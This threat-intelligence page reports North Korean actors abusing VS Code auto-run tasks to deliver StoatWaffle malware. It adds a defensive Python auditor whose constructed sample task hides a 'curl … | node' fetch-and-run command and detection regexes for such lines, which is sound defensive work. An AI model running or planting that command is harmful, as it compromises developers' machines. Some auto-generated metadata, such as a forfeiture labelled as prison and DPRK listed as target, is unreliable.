North Korean Hackers Deploy StoatWaffle Malware via VS Code Tasks
2026-03-23 18:09 | Severity: CRITICAL / HIGH
Executive Summary (AI-generated)
The US Department of Justice has announced the sentencing of three men, Audricus Phagnasay, Jason Salazar, and Alexander Paul Travis, for their roles in furthering North Korea's fraudulent information technology worker scheme. The three were found guilty of effectively handing North Korean overseas IT workers the identities and access they needed to earn illicit revenue. The scheme is a structured network of IT workers recruited from prestigious universities in North Korea who pass an intensive interview process before joining; those chosen do not operate as junior developers but as founders, CTOs, and senior engineers with elevated access to company technical infrastructure and cryptocurrency wallets. It sits alongside a coordinated malware campaign targeting cryptocurrency professionals through LinkedIn social engineering, fake venture capital firms, and fraudulent video conferencing links. That campaign abuses VS Code auto-run tasks to deploy StoatWaffle malware, which has been attributed to the North Korean actors behind Contagious Interview (also tracked as WaterPlum).
Technical Mitigations (AI-generated)
* Treat repositories shared during recruitment or coding tests, or originating from unfamiliar sources, as untrusted: review their contents, including any .vscode/tasks.json, before opening them in VS Code, and do not accept the Workspace Trust prompt for code you have not inspected.
* Install only vetted npm packages and keep dependencies updated and patched; the attack chain falls back to a malicious npm dependency when its primary payload cannot be retrieved.
* Implement robust access controls, such as multi-factor authentication (MFA) and role-based access control (RBAC), to limit developer privileges and prevent unauthorized access to sensitive systems or data.
* Update VS Code to version 1.109 or later and leave the "task.allowAutomaticTasks" setting at its default of "off", so that tasks configured with "runOn: folderOpen" do not execute automatically when a workspace is opened; version 1.110 adds a secondary warning prompt when an auto-run task is detected in a newly opened workspace.
Intelligence Metadata
Actors / Malware / CVEs / Campaigns: Contagious Interview; BeaverTail; InvisibleFerret
Target & Sectors: DPRK; technology; government
Incident Timeline
November 2025
North Korean hackers used VS Code auto-run tasks to deploy StoatWaffle malware.
Entities: Phagnasay and Salazar (organisation); $2,000 fine (financial); $193,265 forfeited (financial)
Phagnasay and Salazar were both sentenced to three years of probation and a $2,000 fine. Travis was sentenced to one year in prison and ordered to forfeit $193,265, the amount earned by North Koreans by using his identity.
2025-12-21
Threat actors used a VS Code auto-run task to deploy StoatWaffle malware.
Entities: VS Code (infrastructure); GitHub, GitLab, Bitbucket (organisation)
First disclosed by OpenSourceMalware last month, the attack essentially involves instructing prospective targets to clone a repository on GitHub, GitLab, or Bitbucket, and launch the project in VS Code as part of a supposed job assessment.
December 2025
Threat actors used VS Code auto-run tasks to deploy StoatWaffle malware.
Entities: VS Code, macOS, Windows (infrastructure); tasks.json (observable); Contagious Interview (threat_actor); FlexibleFerret, OtterCookie, GolangGhost, PylangGhost, PolinRider, GitHub, GitLab, Microsoft, Tron, Aptos, BSC, Node.js, Mozilla Firefox, Neutralinojs, WeaselStore (organisation)
The use of VS Code "tasks.json" to distribute malware is a relatively new tactic adopted by the threat actor since December 2025, with the attacks leveraging the "runOn: folderOpen" option to automatically trigger its execution every time any file in the project folder is opened in VS Code. The victims are believed to have been infected via a malicious VS Code extension or an npm package.
In a sign that the threat actors are actively refining their tradecraft, newer mutations of the VS Code projects have eschewed Vercel-based domains for GitHub Gist-hosted scripts to download and execute next-stage payloads that ultimately lead to the deployment of FlexibleFerret. These VS Code projects are staged on GitHub.
Some of the key malware families deployed as part of these attack chains include OtterCookie (a backdoor capable of extensive data theft), InvisibleFerret (a Python-based backdoor), and FlexibleFerret (a modular backdoor implemented in both Go and Python). Its Go and Python variants go by the monikers GolangGhost and PylangGhost, respectively. It's worth mentioning here that FlexibleFerret is also referred to as WeaselStore.
A campaign known as PolinRider has implanted a malicious obfuscated JavaScript payload in hundreds of public GitHub repositories that culminates in the deployment of a new version of BeaverTail, a known stealer and downloader malware attributed to Contagious Interview. The attack is said to have compromised the GitHub account of a long-time neutralinojs contributor with organization-level write access to force-push JavaScript code that retrieves encrypted payloads in Tron, Aptos, and Binance Smart Chain (BSC) transactions to download and run BeaverTail. Among the compromises are four repositories belonging to the Neutralinojs GitHub organization.
Microsoft, in an analysis of Contagious Interview this month, said the threat actors achieve initial access to developer systems through "convincingly staged recruitment processes" that mirror legitimate technical interviews, ultimately persuading victims into running malicious commands or packages hosted on GitHub, GitLab, or Bitbucket as part of the assessment.
"StoatWaffle is a modular malware implemented by Node.js, and it has Stealer and RAT modules," the Japanese security vendor said. "Though we assume that the executing OS is Windows in this article, the essential behaviors are the same for any OS." StoatWaffle has been found to deliver two different modules, among them a stealer that captures credentials and extension data stored in web browsers (Chromium-based browsers and Mozilla Firefox) and uploads them to a command-and-control (C2) server. If the compromised system runs on macOS, it also steals the iCloud Keychain database.
2026-01-13
Threat actors used VS Code auto-run tasks to deploy StoatWaffle malware.
Entities: VS Code (infrastructure); Technology (industry); Security Alliance, Notion[.]so (organisation)
Another analysis from Security Alliance last week has also laid out the campaign's abuse of VS Code tasks in an attack where an unspecified victim was approached on LinkedIn, with the threat actors claiming to be the chief technology officer of a project called Meta2140 and sharing a Notion[.]so link that contains a technical assessment and a URL to a Bitbucket repository hosting the malicious code.
January 2026
Microsoft included a new "task.allowAutomaticTasks" setting in the January 2026 update of VS Code to mitigate North Korean hackers' abuse.
Entities: VS Code, 1.109 (infrastructure); tasks.json (observable); 1.109 version (general_metric)
In response to the ongoing abuse of VS Code Tasks, Microsoft has included a mitigation in the January 2026 update (version 1.109) that introduces a new "task.allowAutomaticTasks" setting, which defaults to "off" in order to improve security and prevent unintended execution of tasks defined in "tasks.json" when opening a workspace.
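As an added example (not code from the article, from Microsoft, or from any vendor the article cites), the following Python script shows the defender-side check for the two facts above: it parses a cloned repository's .vscode/tasks.json (which allows comments and trailing commas), lists every task configured with "runOn": "folderOpen" together with any per-OS command override, flags command lines showing the traits the article describes (a remote script fetched with curl and piped into node, nohup bash -c, silenced output), and reports whether a user settings.json re-enables "task.allowAutomaticTasks", which the article says defaults to "off" from version 1.109. The sample tasks.json and settings are constructed for the example, the example.invalid URL is a placeholder, and the indicator regexes are illustrative assumptions rather than a vendor signature set.

```python
"""Audit a cloned repository's VS Code task configuration for auto-run tasks.
Added example, not code from the article, Microsoft, or any vendor it cites. It
covers the "runOn": "folderOpen" technique and the "task.allowAutomaticTasks"
setting described above; sample inputs are constructed, and the indicator
regexes are illustrative assumptions rather than a vendor signature set."""
import json
import re

# Traits the article attributes to the malicious task command lines (assumed
# patterns for illustration).
RISKY_PATTERNS = {
    "remote fetch piped to interpreter":
        re.compile(r"\b(curl|wget)\b.*\|\s*(node|bash|sh|python3?)\b"),
    "detached background shell": re.compile(r"\bnohup\b.*\bbash\s+-c\b"),
    "silenced output": re.compile(r">\s*/dev/null\s+2>&1"),
}


def strip_jsonc(text: str) -> str:
    """tasks.json allows comments and trailing commas; strip both (outside
    string literals) so json.loads() accepts the document."""
    out, i, in_str = [], 0, False
    while i < len(text):
        ch = text[i]
        if in_str:
            out.append(ch)
            if ch == "\\" and i + 1 < len(text):  # keep the escaped char verbatim
                i += 1
                out.append(text[i])
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            out.append(ch)
        elif text.startswith("//", i) or text.startswith("/*", i):
            line_comment = text[i + 1] == "/"
            end = text.find("\n", i) if line_comment else text.find("*/", i + 2)
            i = len(text) if end < 0 else end + (0 if line_comment else 2)
            continue  # a line comment leaves its newline in place
        else:
            out.append(ch)
        i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def _command_lines(task: dict) -> list:
    """Command line of the task plus its per-OS overrides ("windows", "osx",
    "linux"), which VS Code applies depending on the host OS."""
    specs = [task] + [task[k] for k in ("windows", "osx", "linux")
                      if isinstance(task.get(k), dict)]
    return [" ".join([str(s["command"])] + [str(a) for a in s.get("args", [])])
            for s in specs if "command" in s]


def auto_run_tasks(tasks_json: str) -> list:
    """Every task VS Code would start on folder open, with the traits found."""
    findings = []
    for task in json.loads(strip_jsonc(tasks_json)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        lines = _command_lines(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "commands": lines,
            # "reveal": "silent" keeps the task terminal hidden from the user
            "hidden": task.get("presentation", {}).get("reveal") == "silent",
            "indicators": [name for name, rx in RISKY_PATTERNS.items()
                           if any(rx.search(line) for line in lines)],
        })
    return findings


def automatic_tasks_allowed(settings_json: str) -> bool:
    """True if user or workspace settings re-enable auto-run tasks; per the
    article the setting defaults to "off" from VS Code 1.109."""
    settings = json.loads(strip_jsonc(settings_json)) if settings_json.strip() else {}
    return settings.get("task.allowAutomaticTasks", "off") == "on"


def audit(tasks_json: str, settings_json: str = "") -> dict:
    """One verdict a post-clone hook or CI job can act on."""
    tasks = auto_run_tasks(tasks_json)
    return {"auto_run_tasks": len(tasks),
            "suspicious": [t for t in tasks if t["indicators"]],
            "would_execute": bool(tasks) and automatic_tasks_allowed(settings_json)}


# Constructed sample .vscode/tasks.json from a "coding test" repository; the
# URL is a placeholder and nothing here is a real artefact from the campaign.
SAMPLE_TASKS = r'''{
  // build helper (constructed sample)
  "version": "2.0.0",
  "tasks": [
    { "label": "prepare-env", "type": "shell", "command": "echo preparing",
      "osx": { "command": "nohup bash -c 'curl -s https://example.invalid/x.js | node' >/dev/null 2>&1 &" },
      "runOptions": { "runOn": "folderOpen" }, "presentation": { "reveal": "silent" }, },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}'''
# Constructed: a user who switched the 1.109+ default back to "on".
SAMPLE_SETTINGS = '{ "task.allowAutomaticTasks": "on" }'

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_TASKS, SAMPLE_SETTINGS), indent=2))
```

Run it over a freshly cloned repository before opening the folder in VS Code, or in a CI job that vets candidate repositories; a verdict with "would_execute" true means the task would start as soon as the workspace is opened and trusted. The per-OS override check matters because, as the article notes, the payload served depends on the operating system of the host, so a task whose top-level "command" looks harmless can still carry a malicious "osx" or "windows" variant.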
February 2026
North Korean threat actors used VS Code auto-run tasks to deploy StoatWaffle malware.
Entities: 1.110, macOS, Windows (infrastructure); 1.110 release (general_metric); the U.S. Department of Justice (DoJ), Audricus Phagnasay, Workspace Trust, GhostCall, ClickFix, CAPTCHA, Terminal, MacPaw (organisation)
"This version and the recent February 2026 (version 1.110) release also introduce a secondary prompt that warns the user when an auto-run task is detected in a newly opened workspace." This acts as an additional guard after a user accepts the Workspace Trust prompt.
The findings come as the U.S. Department of Justice (DoJ) announced the sentencing of three men -- Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 -- for their roles in furthering North Korea's fraudulent information technology (IT) worker scheme in violation of international sanctions.
"The campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows." The activity shares overlap with clusters tracked as GhostCall and UNC1069. "The attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal," MacPaw's Moonlock Lab said.
2026-03-16
North Korean hackers used VS Code auto-run tasks to deploy StoatWaffle malware.
Entities: DPRK (source_region); Korea, Democratic People's Republic of (target_region); IBM, NTT Security (organisation)
Last week, Flare and IBM X-Force published a detailed look at the IT worker operation and its internal structure, while highlighting how IT workers attend prestigious universities in North Korea and go through a rigorous interview process themselves before joining the scheme.
"This task is configured so that it downloads data from a web application on Vercel regardless of executing OS [operating system]," NTT Security said in a report published last week.
2026-03-23
North Korean-linked hackers target developers via malicious VS Code projects, deploying StoatWaffle malware.
Entities: VS Code, Visual Studio Code, macOS (infrastructure); Contagious Interview (threat_actor); Microsoft Visual Studio Code, StoatWaffle, Red Asgard, TsunamiKit, XMRig, The Hacker News, Node.js, Apple, DPRK (organisation)
North Korea-Linked Hackers Target Developers via Malicious VS Code Projects. The North Korean threat actors associated with the long-running Contagious Interview campaign have been observed using malicious Microsoft Visual Studio Code (VS Code) projects as lures to deliver a backdoor on compromised endpoints. "This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system," security researcher Thijs Xhaflaire said in a report shared with The Hacker News.
North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware. The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as StoatWaffle that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects. The end goal of these efforts is to abuse VS Code task configuration files to execute malicious payloads staged on Vercel domains, depending on the operating system on the infected host. The task is configured such that it runs every time that file or any other file in the project folder is opened in VS Code by setting the "runOn: folderOpen" option.
Contagious Interview Using VS Code Tasks. Subsequent iterations of the campaign have been found to conceal sophisticated multi-stage droppers in task configuration files by disguising the malware as harmless spell-check dictionaries as a fallback mechanism in the event the task is unable to retrieve the payload from the Vercel domain. The starting point of the attack chain is no different in that it's activated when the victim clones and opens a malicious Git repository using VS Code. "When the project is opened, Visual Studio Code prompts the user to trust the repository author," Xhaflaire explained.
Using a seemingly harmless dictionary file as a backup option (Source: OpenSourceMalware)
"On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely and pipe it directly into the Node.js runtime." This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output. "It's worth noting that the payload we observed for macOS was written purely in JavaScript and had many signs of being AI assisted."
Interestingly, the attack chain is engineered to fall back to two other methods: installing a malicious npm dependency named "grayavatar" or running JavaScript code that's responsible for retrieving a sophisticated Node.js controller, which, in turn, runs five distinct modules to log keystrokes, take screenshots, scan the system's home directory for sensitive files, substitute wallet addresses copied to the clipboard, steal credentials from web browsers, and establish a persistent connection to a remote server. In one case, the Apple device management firm said it observed more JavaScript instructions being executed roughly eight minutes after the initial infection.
The development comes as Red Asgard detailed its investigation into a malicious repository that has been found to use a VS Code task configuration to fetch obfuscated JavaScript designed to drop a full-featured backdoor named Tsunami (aka TsunamiKit) along with an XMRig cryptocurrency miner. "The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools."
Threat actors with ties to the Democratic People's Republic of Korea (DPRK) are known to specifically go after software engineers, particularly those working in the cryptocurrency, blockchain, and fintech sectors, as they often tend to have privileged access to financial assets, digital wallets, and technical infrastructure.
To counter the threat, developers are advised to exercise caution when interacting with third-party repositories, mainly those originating from unfamiliar sources or shared directly during coding tests; review source code contents before opening them in VS Code; and install only vetted npm packages.
Tactical Metrics
Affected Product (infrastructure): VS Code / Visual Studio Code; macOS; Windows
Software Version (infrastructure): 1.109 (January 2026 VS Code update introducing the "task.allowAutomaticTasks" setting, default "off"); 1.110 (February 2026 release adding the secondary prompt for auto-run tasks in a newly opened workspace)
Financial: $2,000 fine (Phagnasay and Salazar, each with three years of probation); $193,265 forfeited (Travis, with one year in prison)
Intelligence Sources
The Hacker News, 2026-01-20
The Hacker News, 2026-03-23
Incident Version History: current version, last updated 2026-04-27T11:35
Comprehensive Tactical Telemetry
Highly Correlated Entities (mentions, category, type: value):
* 40x organisation, Identified Entity: Security Alliance
* 8x timeline, Temporal Reference: 2026-01-13
* 5x tactic, Cyber Operation Type: Espionage
* 4x infrastructure, Affected Product: VS Code
* 4x tactic, MITRE ATT&CK Technique: T1059.006 - Python
* 3x target region, Target Country: Korea, Democratic People's Republic of
* 2x industry, Targeted Sector: Technology
* 2x malware, Malware Payload: BeaverTail
* 2x infrastructure, Software Version: 1.109
Contextual Telemetry (8 metrics):
* source region, Origin Country: Korea, Democratic People's Republic of
* source region, Origin Region: DPRK
* threat actor, APT Group: Contagious Interview
* target region, Target Region: DPRK
* general metric, Version: 1
* general metric, Release: 1
* financial, $ Fine: 2,000
* financial, Prison: 193,265